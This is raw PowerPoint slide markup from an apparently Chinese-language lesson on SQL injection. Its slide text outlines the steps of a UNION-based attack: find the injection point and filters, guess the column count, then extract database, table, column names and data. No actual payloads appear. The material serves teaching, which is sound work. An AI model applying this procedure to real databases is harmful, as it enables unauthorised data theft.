            <a:ext cx="1355475" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="6600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>01.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="475574"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="椭圆 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4161C916-944D-4763-8B84-9D12DFF581A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10513692" y="1714500"/>
            <a:ext cx="787540" cy="787540"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="20000">
                <a:srgbClr val="475574">
                  <a:alpha val="76000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="77000">
                <a:srgbClr val="F2D4AA">
                  <a:alpha val="66000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="椭圆 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B017DFD5-6ED9-4471-ABB5-07DB969177C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3665420" y="5227057"/>
            <a:ext cx="343873" cy="343873"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="20000">
                <a:srgbClr val="475574">
                  <a:alpha val="76000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="77000">
                <a:srgbClr val="F2D4AA">
                  <a:alpha val="66000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gra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pc="600">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="文本框 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAF4E3DC-0036-4E55-8BCA-1B5E78FA2CE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4947448" y="3288454"/>
            <a:ext cx="4970991" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="475574"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="475574"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2826148778"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447869" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1021624" y="701566"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>注入利用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="文本框 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6C0F0E6-2D2C-4628-8D7A-71F8D2ACE8EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="995625" y="1563217"/>
            <a:ext cx="3375441" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>最简单的利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>爆库</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D83B467-6609-40AF-871C-0363074FC930}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1442343" y="4153811"/>
            <a:ext cx="2291717" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>③ 爆数据库名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本框 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{396A3D28-7217-44E0-A6B2-80FCA3F5301E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1442343" y="4766820"/>
            <a:ext cx="2291717" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>④ 爆表名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BFCB8AC-724A-4A5C-A776-6480BCA732AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1454128" y="5376741"/>
            <a:ext cx="2291717" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>⑤ 爆列名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="文本框 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDC8A09A-DCEF-4575-A4BF-76A258C10948}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1442343" y="5986662"/>
            <a:ext cx="2291717" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>⑥ 爆数据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D16F4EBD-8D79-4ED6-B5C2-51EA8CA7C525}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1438562" y="3041463"/>
            <a:ext cx="10210614" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>① 判断是否存在注入点，注入点的类型，是否有过滤，过滤了那些关键字</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="文本框 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCF3E784-F552-4695-9EF3-EC1BFAF7C78E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1440212" y="3558907"/>
            <a:ext cx="4226798" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>② 猜解查询的列数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E550488-5C35-4E04-9E83-C96C54287F29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539614" y="2357414"/>
            <a:ext cx="2643202" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>一般的注入步骤：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3573371893"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
